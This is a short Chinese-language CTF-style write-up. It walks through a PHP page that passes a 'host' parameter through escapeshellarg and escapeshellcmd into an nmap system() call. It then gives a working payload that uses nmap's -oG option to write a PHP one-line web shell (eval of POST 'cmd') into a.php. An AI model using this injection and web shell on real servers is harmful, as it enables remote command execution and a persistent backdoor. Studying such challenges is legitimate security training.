//首先看到前两行代码X_FORWARDED_FOR和REMOTE_ADDR这里是让服务器用来获取ip用的这里没什么用
```handlebars
if(!isset(
$_GET['host'])) {//这里传进来了一个参数
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host); /*一眼就能看出来这里的
$host = escapeshellcmd($host); 代码很不凡,在下面分析*/
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); //$_SERVER['REMOTE_ADDR'] #正在浏览当前页面用户的 IP 地址。
echo
'you are in sandbox '.$sandbox;
@
mkdir($sandbox);
chdir($sandbox);
echo
system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
//执行把host传进来的nmap命令,nmap的一个参数-oG可以实现将命令和结果写到文件
}所以我们利用-oG参数往网站里面写一行一句话木马,
?host=’ <?php @eval($_POST["cmd"]);?> -oG a.php ’
我们利用-oG命令来将一句话木马输入到a.php,
其实就是将参数的数值输入到制定目标文件里,如果没有制定目标文件就创建。